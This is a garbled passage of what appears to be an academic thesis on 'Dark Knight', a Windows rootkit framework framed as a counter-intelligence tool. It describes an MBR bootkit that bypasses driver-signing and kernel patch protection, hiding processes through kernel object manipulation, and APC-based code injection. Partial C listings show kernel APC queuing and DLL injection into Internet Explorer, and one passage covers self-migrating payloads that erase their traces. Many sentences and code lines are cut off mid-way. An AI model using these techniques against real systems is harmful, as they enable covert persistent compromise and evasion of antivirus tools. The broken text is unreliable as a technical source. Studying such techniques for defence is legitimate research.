With the boot process altered, and the bootkit controlling any further R/W access,
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 36
Load bootmgr
Load Infected with modified BCD Execute 64−bit:
MBR OS loader patch security
Load 32−bit: routine to pass
mbr load on image hash
Load
bootmgr
bootstrapping of the target OS begins. This process is illustrated in Figure 2.2. The
Windows bootmgr is loaded and executed, the BCD is read into memory along with
the Windows loader, winload.exe. The start-up options in winload.exe are altered
to stop the initialization of Windows from entering WinPE mode. If winload.exe is
allowed to enter WinPE mode then it utilizes the MININT flag that makes any changes
to the SYSTEM registry hive volatile, and therefore not persistent across restarts. The
start-up process continues with either a 32-bit or 64-bit loader—depending on the
architecture of the target system—injecting a specified malicious driver into the target
OS’s kernel-mode. Once the malicious driver is kernel-mode resident in the target OS
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 37
KMCS is a feature that was added to 64-bit versions of Windows that requires any
loaded kernel-mode software to be digitally signed with a Software Publishing Cer-
tificate (SPC) in order to be loaded into the OS kernel [65]. Another requirement for
KMCS is that any boot-loaded drivers must have their driver binary image signed
with an embedded key in order for the driver to be instantiated into the kernel during
boot [65]. KPP is another addition to 64-bit versions of Windows that protects the
kernel from unauthorized patching of the SSDT, IDT, GDT or any other part of the
kernel [66]. Both signed code execution and patch protection against kernel-mode
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 38
modifications are not just limited to Windows, various other OS utilize similar tech-
niques to deter malicious code execution. Bootkits enable the subversion of these
protection mechanisms through the altering of BCD data in order to change WinPE
booting, disabling of signed certificate checks and enabling of test signing, hijacking
of legitimate signed certificates, and patching the boot manager (bootmgr) and OS
exploited recently in the wild. This involves the employment of large-scale clusters
performing factoring attacks on cryptographically weak RSA 512-bit keys used in
digital certificates [68]. Once a digital certificate has been factored it can then be
used to sign any piece of code in order to satisfy the KMCS policies. This effectively
enables any driver to be signed with an authentic certificate belonging to a legitimate
corporation.
While there is no necessity to bypass KMCS and KPP, and we could sign our
driver and load it through the normal channels, this leads to a compromise of our
stealth. To that end, we have chosen to employ the MBR techniques described herein
signed code execution and patch guarding against kernel-mode alterations. Although
this technique has been previously deployed in the wild, it still proves a difficult
mechanism to identify, and especially challenging to remove. These factors make the
bootkit methodology an ideal first stage bootstrapping tool, aiding our developed
The internal data structures and operating mechanisms of Windows NT-based kernels
consist of a wide array of non-exported functionality and variables that can be used
for counter-intelligence operations. Non-exported functionality and variables are not
normally available to user-mode applications and kernel-mode extensions, and are
only accessible via Software Reverse Engineering (SRE) efforts. The remainder of
this section discusses our SRE effort to recover the internal structures of the Windows
kernel necessary to employ APCs. We also describe the techniques used to reverse
engineer these data structures.
The Windows NT kernel contains a large array of exported functions via API
layers for both user-mode (WIN32API) and kernel-mode (WINDDK) program imple-
mentations. This allows developers to develop applications or device drivers targeting
Windows without significant overhead. However, there are certain functions and vari-
ables that are omitted from these API packages. This is referred to as non-exported
functionality, and operates in this manner to hide low-level OS data structures from
malicious software; whether it be rootkits performing stealth activity or poorly im-
plemented programs that cause critical errors.
Non-exported functionality has been previously documented [69, 70, 71, 72], but
this work only went as far as to document a list of variables that are not exported
by the kernel and defined primitive methods to gain access to these variables. Recent
rootkits have used this in order to access the system thread table—the PspCidTable
on Windows, although this construct is not limited to Windows—a linked list contain-
ing pointers to every process and thread residing on the machine. The most notable
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 40
rootkits employing this technique include FU and FUTo, previously discussed in Sec-
tion 2.3.2.
The version-specific approach to using this table requires a set of predefined memory
offsets to access and manipulate specific locations within the kernel. This is effective
if the version of the OS that is infected is covered by the predefined offsets. Otherwise
the rootkit will encounter a critical or fatal error that may in turn result in a system
failure.
Rather than performing direct memory accesses and manipulations, we have opted
to reverse engineer the internal data structures of the Windows NT kernel to increase
OS version coverage. This was performed using a variety of techniques, primarily in-
volving live kernel debugging sessions with WinDbg [73] and recreating the associated
regions as well as all important non-exported variables from the kernel debugger
structure; implemented in Windows as the KDDEBUGGER DATA64 structure, as shown
Listing 2.1. The data structures used throughout this routine are documented in
Appendix A.
systems a KPCR structure exists for each of the cores residing at a dynamic location.
We acquire a pointer to the current KPCR structure—in a single- or multiprocessor
agnostic approach—via the KeGetKpcr function. Various techniques for acquiring the
dynamic address of the KPCR are possible. Once we have the KPCR location we
walk through the series of internal structures until we obtain a pointer to the ker-
nel debugger structure. This hooking mechanism via traversing the kernel’s internal
structures enables us to return a pointer to the system thread table in a generic way
that works across the entire family of Windows NT OS via SRE and the recreation
of the data structures documented in Appendix A. This can also be used to obtain
pointers to the other non-exported functionality and variables hidden within the ker-
nel debugger structure, documented in Appendix A.1.10, such as the loaded module
list (PsLoadedModuleList).
Comparatively, the FU and FUTo rootkits acquire the system thread table through
a convoluted process of scanning the PsLookupProcessByProcessId function to lo-
cate the push instruction that places the system thread table address onto the stack
[36]. This is a computationally expensive process, requiring real-time disassembly
and kernel-mode memory accesses that may trigger security protection mechanisms.
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 42
Listing 2.1: Hooking the kernel debugger structure (KDDEBUGGER DATA64) structure
to access a non-exported variable; in this case the system thread table
(PspCidTable).
PKPCR NTAPI KeGetKpcr ( VOID )
{
PKPCR pKpcrAddr = NULL ;
SYSTEM_INFO siInfo ;
return ( pKpcrAddr ) ;
}
// Hook KPCR
pKpcr = KeGetKpcr () ;
return ( pHandleTable ) ;
}
Once the system thread table is available we are free to traverse its contents and
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 43
Initialized
Ready
List entry
State: not ok /
Alertable: false / Get State, Alertable, and
ApcQueueable: false ApcQueueable members
Check
thread
State: ok &
Alertable: true &
ApcQueueable: true
Thread APC
injectable
Complete
Figure 2.3: Locating desired threads by walking the system thread table
(PspCidTable) on a Windows target.
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 44
access or manipulate any process or thread residing on the system. This is illustrated
in Figure 2.3 showing the methodology of acquiring suitable threads meeting our
in Chapter 3. This process begins by acquiring a pointer to the system thread table
(PspCidTable) via the kernel processor control region (KPCR). We traverse the list
entries in the system thread table while checking each of the thread entries against
our three criteria until a suitable candidate is located. On Windows we test the
criteria by comparing the values stored in the executive thread structure (pointed to
by our acquired handle) and the kernel APC structure—implemented as KAPC and
documented in Appendix A.1.6—that is a member of the executive thread structure.
This general concept applies to other OS as they have similar management structures
to keep track of processes and threads. We can also further our specificity by supplying
a target image name, such as services.exe, forcing injection into a desired target
process.
Utilizing this direct access to internal kernel information (shown in Figure 2.3) and
building on the previous techniques to traverse the Window’s kernel to acquire point-
ers to non-exported functionality and variables (shown in Listing 2.1), we are able to
our findings we focus on APCs, outlined briefly in Section 2.5, that allow the exe-
cution of code in both kernel-mode and user-mode in ways that satisfy the criteria
outlined in Section 2.2. We have also identified the capabilities of this technique
clude MBR bootstrapping (Section 2.6.1) as well as undocumented kernel data struc-
tures that exist throughout the entire dynasty of the Windows NT OS family and the
2.8 Summary
In this chapter we have outlined the history of rootkit techniques: user-mode, kernel-
mode, VMBR, SMBR, and MBR. Based on these techniques we have three criteria to
consider the effectiveness of a framework in support of counter-intelligence operations.
These include:
2.8. SUMMARY 46
• Stealth Capability: The ability to remain hidden within the target OS.
• Semantic Gap: The richness of data types and structures as viewed within the
target OS.
Based on these criteria we have chosen to focus on kernel-mode (ring 0) as the target
privilege level for our counter-intelligence framework, thereby also enabling us to
into APCs. We also briefly presented previous work that has employed APCs with a
similar focus to our own in order to understand the capabilities APCs currently offer.
Supporting research was investigated regarding the Windows NT-based OS. This
supports both the persistence of our framework, through the use of MBR bootstrap-
ping, and hooking into undocumented functionality, through the reverse engineering
Chapter 3
This chapter begins by building on the summary presented in Chapter 2.5 with a
thorough overview of APCs. We present an example use case of APCs to better
understand their inner workings, and provide brief overviews of the various other tasks
APCs accomplish. This continues with an investigation of their internal structure and
operational requirements as defined by Probert [56, 74].
ter 4. Injection enables the insertion and execution of a payload in a process’ context
while masking the payload’s origin. Utilizing injection, we present two separate tech-
niques introduced by this research: Trident and Sidewinder. Trident involves the use
3.1 Overview
chronous callbacks, and the underlying kernel method to achieve this. These are
referred to as Asynchronous Procedure Calls (APC), allowing a thread to divert from
its original path and execute a piece of foreign code [75].
regular execution. Upon completion in kernel-mode, and once the user-mode thread
executes with a low Interrupt Request Level (IRQL) of 0 (PASSIVE) or 1 (APC),
the APC is delivered and the I/O operation completes providing the thread with the
result of the associated I/O operation [76]. The set of IRQLs supported by Windows
is listed in Table 3.1 with the associated IRQ name and type of each level. This shows
that APCs only execute when the processor is in a PASSIVE or APC IRQL.
APCs are used extensively throughout the kernel to accomplish tasks and function-
creating and destroying processes and threads, as well as performing error reporting
3.1. OVERVIEW 49
[56]. This is by no means a complete list of their employment, but it does show the
• Special Kernel-Mode: This is a special form of APC that can preempt regular
kernel-mode APCs. This type of APC is used for OS-level tasks such as creating
or terminating processes or threads.
Looking at these different types, and the varying levels with which they are expected
to interact with user-mode and kernel-mode, it is apparent that APCs were designed
to complement Deferred Procedure Calls (DPC). DPCs are a mechanism by which the
3.1. OVERVIEW 50
OS can guarantee that a routine will be executed on a specific processor. They operate
one IRQL higher than APCs, as dictated in Table 3.1 at the DISPATCH IRQL. DPCs
are queued by an Interrupt Service Routine (ISR), where the work is deferred to the
DPC routine to perform the task [56]. This implies that a pending DPC will suspend
execution of the preempted thread until the DPC completes, differing from APCs
where execution is allowed to continue until the issued interrupt returns, suspending
thread execution.
The interactions between APCs and DPCs are shown in Figure 3.1 from [56].
This outlines the process through which the OS kernel performs thread scheduling,
an important methodology for our later considerations of how APCs can be used as
an attack vector in the Windows kernel.
associated threads. By tracking the state graph, and referring back to the purposes
APCs and DPCs serve throughout the OS, it becomes clear that they are not only
to perform a wide range of process and thread activity; including KeInitThread and
KeTerminateThread that both employ APCs for thread creation and deletion.
This also provides us with insight into what state a thread must currently be
operating at in order to inject an APC into the queue. It is important to identify the
semantics of thread states, which include the following states as described in [77]:
• Ready: The state of a thread waiting to execute after being tasked to a particular
processor or swapped back into memory after a context switch.
• Running: The state of a thread once a context switch is performed and execution
begins.
• Terminated : Once a thread finishes execution it enters this state and waits for
the dispatcher to destroy it.
• Waiting: The state entered when it either voluntarily waits for an object to
synchronize or the OS must wait for the requested action to complete (such as
I/O paging).
• Transition: The state of thread that is ready for execution but its associated
stack is paged out of memory.
• Deferred Ready: When a thread has been tasked to run on a specific processor
but has not yet been scheduled.
• Gate Waiting: When a thread is waiting for a gate dispatcher object to be ready.
This state is not shown in Figure 3.1 as the diagram is specific to earlier NT-
If a thread is currently in a proper alertable wait state then an APC will fire im-
mediately. Alternatively, if the thread is in the ready or running state the APC will
be queued to run the next time the thread is scheduled to execute. A problem exists
when a thread is in a specific state in which the processor is operating at the DIS-
PATCH IRQL, in which case an APC will be preempted. Looking at the transitions
3.1. OVERVIEW 53
we see that avoiding the APC preemption paths that may trigger this problem due to
issued DPCs—requiring the processor to execute at an elevated DISPATCH IRQL—
requires the avoidance of the deferred ready state. Thus, we only want to fire an APC
into the target thread after a KiRetireDpcList, KiSwapThread, KiExitDispatcher,
KiProcessDeferredReadyList or KiDeferredReadyThread call. At this point the
processor’s current IRQL is lowered, dropping below the DISPATCH IRQL and en-
abling APC or PASSIVE IRQL execution to continue [56].
From Figure 3.1 we also infer the associated traits of a thread required to support
APCs, as outlined by MSDN [78, 1], describing the conditions that must be met for
each type of APC to properly work. These conditions are shown in Table 3.2. The
boolean conditions Alertable and WaitMode are passed to KeWaitForSingleObject,
KeWaitForMultipleObjects, KeWaitForMutexObject, or KeDelayExecutionThread
affecting the behavior of the associated waiting thread [1]. The Alertable value
defines whether the thread can be alerted in order to abort a wait state.
Once the proper conditions have been met we begin by initializing a kernel APC
object (KAPC), outlined in Appendix A.1.6, describing the APC environment. A kernel
APC object outlines every detail relating to the APC, from a kernel thread structure
detailing the associated target thread, to the associated APC routines and operating
mode. We continue with a full dissection of the kernel APC object.
Appendix A.1.6 contains the Type and Size members used internally by the ker-
nel, an executive kernel thread structure (KTHREAD) pointing to the associated target
thread, the routines to be executed throughout the APCs lifetime, the ApcStateIndex
that uses one of the environments defined by the enumeration listed in Listing 3.1,
the NormalContext that is set based on the ApcMode and the routines that are
3.1. OVERVIEW 54
Table 3.2: Asynchronous Procedure Call Operational Conditions (adapted from [1])
set to non-null values, the ApcMode which defines the mode of operation as either
KernelMode or UserMode, and a value indicating whether the APC has been Inserted
or not. There are three routines that can be associated with the kernel APC object:
KernelRoutine, RundownRoutine and NormalRoutine. The routines define specific
behaviour associated with the APC; the KernelRoutine is required and defines the
first function the driver will execute upon successful delivery and execution of the
APC, the NormalRoutine function can define either a user-mode APC or regular
cial kernel-mode, and lastly RundownRoutine can be used optionally which defines a
kernel-mode component that is only called if the APC queue is discarded in which
case neither the associated KernelRoutine or NormalRoutine are executed. This is
to KeInsertQueueApc, also prototyped in Listing 3.1, is made that adds the APC
to the target thread’s queue. The prototypes outlined in Listing 3.1 draw from the
Based on this dissection of APCs, and the various associated structures and func-
tions, we present an example to illustrate their mechanics in Listing 3.2. In this ex-
ample we have the function ApcFireThread that inserts a special kernel-mode APC
into the queue of a target thread. We begin by initializing the kernel APC object with
the APC environment, our three operational routines, the ApcMode (in this case
3.1. OVERVIEW 56
Listing 3.1: Undocumented Windows NT DDK kernel APC function prototypes and
structures.
typedef enum _ K A P C _ E N V I R O N M E N T
{
OriginalApcEnvironment ,
AttachedApcEnvironment ,
CurrentApcEnvironment
} KAPC_ENVIRONMENT ;
NTKERNELAPI BOOLEAN K e I n s e r t Q u e u e A p c (
IN PRKAPC Apc ,
IN PVOID SystemArgument1 ,
IN PVOID SystemArgument2 ,
IN KPRIORITY Increment
);
KernelMode), and the NormalContext. In this case we have neglected to set two of
our routines, the RundownRoutine and NormalRoutine, leaving them as null for sim-
along our kernel APC object, any appropriate parameters, and the APC completion
event we previously initialized. At this point the APC has been queued in the target
thread’s context and is scheduled for execution when the processor associated with
the target thread drops below the DISPATCH IRQL (to APC or PASSIVE).
The discussed capabilities of APCs in this section have outlined their various
3.1. OVERVIEW 57
Listing 3.2: Example queuing of an APC into a target thread’s context illustrating
KeInitializeApc and KeInsertApc.
void A p c K e r n e l R o u t i n e ( PKAPC pkApc ,
P K N O R M A L _ R O U T I N E NormalRoutine ,
PVOID NormalContext ,
PVOID SystemArgument1 ,
PVOID SystemArgument2 )
{
// P l a c e h o l d e r for K e r n e l M o d e APC routine that e x e c u t e s
// in the target thread ’s context ( address space )
}
// ...
// ...
// I n i t i a l i z e event
K e I n i t i a l i z e E v e n t ( pkApcCompletionEvent , // APC c o m p l e t i o n event
NormalEvent , // Event type
FALSE ) ; // Initial state
// ...
// ...
return (0) ;
}
strengths. This includes their ability to execute code across the entire OS, from user-
mode to kernel-mode, while masking the origin of the executed payload. They also
find pervasive deployment throughout the OS, appearing innocuous and therefore
3.2. TACTICAL CAPABILITIES 58
difficult to detect. Finally, they execute in the APC IRQL, and although they don’t
receive immediate attention, the incurred delays are minimal as they execute above
the normal PASSIVE IRQL. These factors make them an ideal target to provide
stealth code execution while still allowing any payload to be executed, whether it be
an intrusion detection tool to investigate malicious activity or a covert communication
This section discusses operational techniques that we have developed exploiting APCs.
The techniques utilize our blueprint as previously outlined in the last section. The
3.2.1 Injection
or thread and performing code execution within that process or thread’s context.
This masks the origin of the payload, allows the execution of code in the target’s
privilege level, and enables the payload to appear benign as we can specifically target
process and threads that perform similar functionality, such as performing network
communications over a secure HTTP connection within a web browser’s context. This
subsection outlines how injection attacks utilizing APCs work, presenting a complete
overview of their workings.
[78]:
• Windows API : Various functions exist within the Windows API allowing injec-
process.
Also briefly outlined by Butler and Kendall [78] is the potential use of APCs for the
purpose of injection into a target process or thread. As discussed in this work, APCs
are a unique frontier with no current AV being capable of detecting their use. Any
process or thread on the system is a potential target, thereby providing an extensive
attack surface.
Although we have shown APC’s employment in both public and private sector
malware there exists no full analysis or implementation of them in the context that
we are interested. This subsection intends to present such an outline, discussing the
mechanics of injection attacks at a high-level, enabling an implementation in the next
chapter.
The injection technique does have a set of obstacles that must be tackled in order
or Position Independent Executable (PIE) is used. This subsection will continue with
an outline of the steps involved in APC injection while providing methods to overcome
Start
Acquired
thread
Load payload code and
adjust accordingly
Initialized
Allocate MDL
Allocate memory
pool with MDL
MDL MDL
freed allocated Allocate MDL
TestMdl: not ok TestMdl: ok
Free memory pool Lock memory pages
containing MDL
MDL
ready
Attach to target
process stack
Thread APC
ready failed
Inject payload
Adjust payload
Inject
ready
Complete
loaded kernel32.dll and ntdll.dll libraries, all the while being alertable. This
process is illustrated in Figure 2.3 from Chapter 2.6.2 employing the system thread
ory and create a Memory Descriptor List (MDL), a structure defining a buffer de-
scribed by a set of physical addresses [79]. Once the allocated region has been ver-
ified the virtual address pages describing the MDL are made resident in memory
and locked with MmProbeAndLockPages. Next, the target process is hijacked with
dress space. Once the payload is in place, control of the target is released with
KeDetachProcess or KeUnstackDetachProcess and the APC is queued for delivery
with KeInitializeApc at which point the control flow of the target process executes
the inserted code. This process is outlined in Figure 3.2 showing the function transi-
tions with the associated states. The implementation of this is discussed in the next
chapter.
This technique enables us to directly execute a sequence of instructions within
the context of another process, appearing as if the process is the owner of the code
and masking the payload’s origin. This allows us to execute code in any process’
context on the target system, making it viable to act as a veil of the true intent of
the payload. In this way we can hide the execution of our code in a stealthy manner
while maintaining a close proximity to our target, thereby avoiding any semantic gap
3.2. TACTICAL CAPABILITIES 63
problem, and perform any desireable tasking, such as data exfiltration over a covert
HTTP channel executing within a web browser’s context. This technique thereby
With APC injection explained we are free to consider different methods of covertly
executing code via injection. In this section we investigate two methods of injection
via APCs: kernel-mode to user-mode injection and user-mode to user-mode injection.
The first involves a persistent kernel-mode driver being used as both the jumping off
point for injections as well as for callbacks after the targeted user-mode processes have
completed execution of the injected payloads. This is the primary method employed
and-forget strategy. Once the initial driver has injected the inaugural payload into a
user-mode process the driver is unloaded from kernel-mode. The payload executes its
primary tasking and initiates a new injection via a user-mode to user-mode mechanism
into a different process. After the APC has been queued in the new process, with the
callback function set to the payload itself, the allocated memory segment is destroyed,
This involves the loading of a primary system driver that is used for sanity monitoring
as well as launching all subsequent payloads used in the investigation. This method
3.2. TACTICAL CAPABILITIES 64
mode mirrors the early command guided systems of Trident missiles, and as such
this technique has been dubbed Trident as an homage. The Trident missile is com-
posed of a ballistic missile with Multiple Independently-targetable Reentry Vehicles
(MIRV) as the payload [80]. After attaining a low altitude orbit, the guidance sys-
tem performs a final trajectory update using calibrations based on star coordinates
to aid the inertial guidance system, after which the MIRVs are deployed with their
individual trajectories aimed at multiple targets. This definition is reminiscent with
The Trident technique is illustrated in Figure 3.3. The process begins once the
loader completes the bootstrapping process and the driver is initialized via Driver-
Entry. After the driver is kernel-mode resident it executes the primary tasking that
defines the payloads to be injected and any restrictions that must be considered,
such as process privilege level or loaded drivers. Once suitable candidates are ac-
quired the driver begins injecting payloads into the target processes via APCs, which
can define either a user-mode or kernel-mode APC by setting the ApcMode via the
NormalRoutine. As a safety mechanism we also employ the RundownRoutine in the
case of the APC being discarded from the target process’ queue. In this way all in-
jected payloads execute concurrently in their host processes. Once all payloads have
been injected the driver sleeps, waiting for callbacks from the payloads in the Wait
state. Depending on the results returned and the assigned primary tasking the driver
either unloads via DriverUnload or continues the injection process.
Load driver
Start
Init core
routine
Initialize primary tasking
Inject
payloads
Execute Inject payloads via APC
RundownRoutine
Execute
KernelRoutine
Driver
callback
Unload driver
Complete
Figure 3.3: Trident technique for injecting sequentially or concurrently into multiple
processes while maintaining persistent control from kernel-mode.
each of the tines represents an independent payload injected into a unique process
is called thereby returning control to the primary driver. This allows results from the
inject to be analyzed and further injection or exfiltration of the results performed.
moving target [81]. This terminology draws from the Crotalus cerastes, a venomous pit
viper species, bearing a fitting description for our fire-and-forget injection technique.
The Sidewinder technique has only been speculated in prior text, vis-à-vis Ma-
genta as discussed Section 2.5.2. In this subsection we intend to provide a high-level
overview of how such a mechanism is possible, paving the way for an implementation
in the next chapter.
Rapidly moving through the system provides direct access to the OS while main-
taining a minimal footprint. Although code is constantly being executed, it is always
in the context of a varying set of processes or threads and never remains in any
location for an extended period of time. This makes the locating and analysis of
code employing this technique extremely difficult, and bypasses common AV tech-
Load driver
Start
Init core
routine
Initialize primary tasking
Inject
payload
Inject payload from kernel−mode
into user−mode process via APC
Process 1
Driver
callback
Unload Process 2
driver
Complete
Inject autonomous payload
... into next user−mode process
via APC
Process N
Figure 3.4: Sidewinder technique for injecting autonomous payload that continues
migration through unique system processes.
technique in order to make the driver kernel-mode resident using the loader to boot-
strap the driver and execute DriverEntry. The Core tasking is executed that lo-
cates a target process, as in Trident, and initiates the injection. The driver injects
3.3. SUMMARY 68
the payload into the target process using a user-mode APC. To bypass detection
methods using PsSetLoadImageNotifyRoutine the driver exits prematurely without
returning true, although the figure shows a configuration that properly unloads with
DriverUnload for completeness. The payload is fully autonomous and upon complet-
ing its tasking in the target process it locates a new target process, injects into it using
an appropriate user-mode injection mechanism and exits from the local process. This
mechanism is free to continue until the embedded tasking orders it to complete or the
machine halts. Upon the machine restarting the bootstrapping loader reinitializes
the process.
The actual injection sequence between user-mode threads, once the initial driver
has exited and the first thread has executed the payload, is shown in Figure 3.5. This
shows the process through which the tasking payload is executed, the proper libraries
get loaded with GetProcAddress and LoadLibrary, a new thread is selected and ac-
quired, and the APC is allocated and injected into the new thread with QueueUserApc.
Once this is accomplished the current thread’s memory is destroyed to remove trace
evidence. This completes the self-replicating process through which the user-mode
3.3 Summary
port everything from I/O and timing to thread creation and termination. Through
the dissection of their internal constructs we now understand their various operat-
ing modes—user-mode, kernel-mode and special kernel-mode—and the requirements
3.3. SUMMARY 69
Init
Ready
Tasking
Retry injection complete
process
Get head of thread table
Target
acquired
Payload
injected
Add APC to queue to execute when
IRQL next equals PASSIVE or APC
APC
queued
Delete payload memory
in local process
Complete
Figure 3.5: Autonomous payload injected with Sidewinder for rapid migration be-
tween user-mode processes and threads.
associated with each mode in order for APC firing to occur in a target process or
thread.
With the acquired information from the APC blueprint we explored the capability
3.3. SUMMARY 70
of APCs to perform injection. With injection we are able to insert a payload into a
process’ context and have it execute while masking the payload’s origin. This gives
mechanism to fire a single payload into a thread that propagates through the system
autonomously executing our desired payload.
These findings support the criteria outlined in Section 2.2, and are evidence of the
capacity of the various researched techniques to support counter-intelligence opera-
tions. With these techniques we are able to formulate a framework to support such
counter-intelligence operations. We present such a framework in the next chapter.
71
Chapter 4
Dark Knight
This chapter discusses the implementation of Dark Knight, our framework developed
to satisfy the requirements based on the criteria outlined in Section 2.2, combining
the functionality outlined in Section 2.6 with the capabilities of APCs as explored in
Chapter 3. This chapter contains an overview of the different framework components
and implementation details of each of the different components.
• MBR Bootkit: The first stage loader of our framework—the bootstrap mecha-
nism that achieves a persistent footprint and initiates kernel-mode residence—is
an MBR modification that hooks interrupt 13h and redirects the bootstrap flow
so the system initialization first enters a segment of code controlled by us. This
allows us to hijack the normal system execution path so our core system driver
can be injected into the Windows bootup process for guaranteed execution as
• Payloads: The various types of packages that can be employed by Dark Knight.
This includes payloads that investigate malicious threats through dynamic in-
This chapter explores each of these components in detail while explaining their re-
spective function within the framework. As such, the chapter is broken down in a
modular fashion to mimic the framework’s construct.
A first stage MBR bootkit loader provides an adequate means of gaining initial control
of the target enabling us to load Dark Knight with primacy. The technique used in
our research follows the methods outlined in Section 2.6.1, using a modified MBR to
redirect the initial OS loading through us.
The Dark Knight driver is broken into multiple segments. It consists of a subsystem
that is loaded into kernel-mode containing units that accomplish various tasks. The
first task involves table hooking, DKOM, and virtual memory subversion enabling the
necessary level of system modifications to maintain a stealth footprint in kernel-mode
4.2. DARK KNIGHT KERNEL-MODE DRIVER 73
table hooks
Kernel−Mode
Target OS
Target System
while also commandeering the required system objects, such as the system thread
table for locating a suitable target thread prior to injection. The second task involves
of APC injection via our Trident and Sidewinder techniques, as outlined in Chapter 3.
The architecture of the Dark Knight kernel-mode driver is shown in Figure 4.1.
4.2. DARK KNIGHT KERNEL-MODE DRIVER 74
This provides a high-level overview of the kernel-mode primacy tables hook, kernel
object manipulation, and virtual memory subversion (Section 4.2.1) as well as the
utilization of both the Trident and Sidewinder injection techniques (Section 4.2.3).
This figure neglects the payload remapping methods (Section 4.2.2) as these apply
internally to the driver or Sidewinder payload and cannot be adaquately evinced.
Together, these pieces build our Dark Knight framework, supporting counter-
intelligence investigations. This section will discuss each of these components and
The first segment of our driver achieves kernel-mode dominance, hooking and modify-
ing required system objects in order to remain concealed while enabling our developed
APC payload injection techniques. This subsection discusses how Dark Knight ac-
complishes this, utilizing table hooking, DKOM, and virtual memory subversion.
The seizure made by the driver follows the tactics outlined in Section 2.6.2, hook-
ing the kernel debugger structure (KDDEBUGGER DATA64) in order to access the non-
exported functionality. Once this is done the driver continues to hook the system
thread table (PspCidTable) to allow for both a complete view of the system’s pro-
cesses and threads as well as the ability to manipulate any given executive process
(EPROCESS) or thread (ETHREAD) structure. The DKOM component can be used to
make any process or thread on the system invisible, to control the alertable nature of
any process or thread in order to force them to execute APCs, as well as any other
4.2. DARK KNIGHT KERNEL-MODE DRIVER 75
alteration to kernel-mode or user-mode objects that enable covert influence over the
system. It is also possible to hijack any, or all, of the tables outlined in Section 2.3.2,
It is also useful to employ the tactics of the Shadow Walker rootkit, as was discussed in
Section 2.3.2. This technique enables redirection of R/W accesses to different virtual
memory locations, making any region viewed via a R/W access look benign, while
mapping the executable memory directly to the desired code segment. By changing
the view between a R/W and an execution we are able to make the central driver
virtually invisible by hiding from any R/W accesses. This makes it increasingly diffi-
cult for any scanning program to locate the driver, if the driver is required to remain
persistent on the system. If we are using the Sidewinder technique, rapidly firing
through memory between different processes and threads, then we have no require-
ment to keep the driver persistent, and can instead use the half-loader technique in
Three payload remapping techniques are explored. These utilize different mechanisms
in positioning injected payloads within a target process or thread’s address space.
code remapping.
then we must dynamically transform the shellcode sequence prior to injecting the
payload into memory. Normally shellcode is written based on a defined set of expec-
tations that occur in a faulty utilization of the stack or heap. We are aware of the
offsets within the shellcode (or have a high certainty when predicting their location),
and are free to define them during their construction. Unfortunately for us, this is
not the case. The location of the injected code constantly changes between every
injection, and therefore we must calculate any dynamic offsets using metamorphic
In order to accomplish this we’ve created the structure shown in Listing 4.1,
METAMORPHIC SHELLCODE. This structure contains pointers to the start, pStart, and
end, pEnd, of the injectable shellcode, as well as a set of transformations to be made.
4.2. DARK KNIGHT KERNEL-MODE DRIVER 77
code has been injected, as denoted by the POST mnemonic. Alternatively, to perform
alterations prior to injection the PRE mnemonic can be used.
Listing 4.2: Metamorphic transformation sequence for inserting text string into pay-
load and linking to associated location.
POST REF :[0 x000001a8 :+0 x28 ] AND INSERT :[0 x000001d0 ]=\ " C :\\ WINXP \\ System32 \\ cmd . exe \"
using the WIN32API enabling PIC injection into target processes. Once the DLL is
created it is injected using the method shown in Listing 4.3, as outlined by Sensey
[82]. This technique operates purely in user-mode.
4.2. DARK KNIGHT KERNEL-MODE DRIVER 78
if (! N t M a p V i e w O f S e c t i o n ) status = -1;
if (! pcView )
{
CloseHandle ( hFile ) ;
status = -1;
}
else
{
strcpy ( pcView , dllName ) ;
}
// start i n j e c t a b l e process
ZeroMemory (& piInfo , sizeof ( piInfo ) ) ;
ZeroMemory (& stInfo , sizeof ( stInfo ) ) ;
stInfo . cb = sizeof ( STARTUPINFO ) ;
{
status = -1;
}
}
else
{
status = -1;
}
// resume s u s p e n d e d thread
ResumeThread ( piInfo . hThread ) ;
CloseHandle ( piInfo . hThread ) ;
CloseHandle ( piInfo . hProcess ) ;
}
else
{
status = -1;
}
UnmapViewOfFile ( pcView ) ;
CloseHandle ( hFile ) ;
return ( status ) ;
}
will inject payload.dll into a new instance of Internet Explorer. This process starts
by creating a function pointer to NtMapViewOfSection, a kernel-mode system service
routine that maps a view of the selected virtual address space section of the target
process. We acquire this pointer by getting the address of NtMapViewOfSection
from ntdll.dll with GetProcAddress. We then proceed to create a file map-
ping of the payload DLL, as specified by dllName. We create our mapping with
CreateFileMapping and map the view of our payload into the address space of
the target process with MapViewOfFile. We then create a suspended thread with
CreateProcess and, using our NtMapViewOfSection function pointer, we map our
payload DLL into the created thread. We complete the DLL injection process issu-
ing a call to QueueUserAPC to queue an APC to our created thread that will ensure
execution once the thread is resumed. We complete the entire process by cleaning up
4.2. DARK KNIGHT KERNEL-MODE DRIVER 80
our open handles, resuming our thread and unmapping our view. This can also be
used to inject into an existing process using OpenProcess instead of CreateProcess.
We have furthered this technique by moving the injection routine from user-mode
into our kernel-mode driver, enabling injection into user-mode processes using the
technique shown in Listing 4.4. This process begins by searching through the target
process’ loaded module list in order to acquire the base address of kernel32.dll.
This is achieved by walking through the target process’ executive process (EPROCESS)
structure, accessing the process execution block (PEB), and finally accessing the pro-
cess’ associated loader data (PEB LDR DATA). Via the loader data we can walk through
each entry (LDR DATA TABLE ENTRY) until we locate the desired entry. From the re-
turned entry we can use the base address of kernel32.dll (DllBase) as a handle
to the DLL, which is used to locate the address of LoadLibrary via GetProcedure-
process with ZwOpenProcess and inserting the path of our payload DLL into mem-
ory via ZwAllocateVirtualMemory. Finally, we initialize our APC object with the
PKNORMAL ROUTINE parameter set to our acquired address of LoadLibrary with the
context set to the path of our payload DLL, and insert the APC into the target pro-
cess’ queue. When the APC next fires LoadLibrary is called and our payload DLL
// Acquire PEB s t r u c t u r e
pPeb = peProcess - > Peb ;
// Iterate through P E B _ L D R _ D A T A
do
{
pDllName = &( pLdrListEntry - > BaseDllName ) ;
// If we located k e r n e l 3 2 . dll
if ( bMatch )
{
// Get the address of L o a d L i b r a r y with m o d i f i e d kernel - mode G e t P r o c A d d r e s s
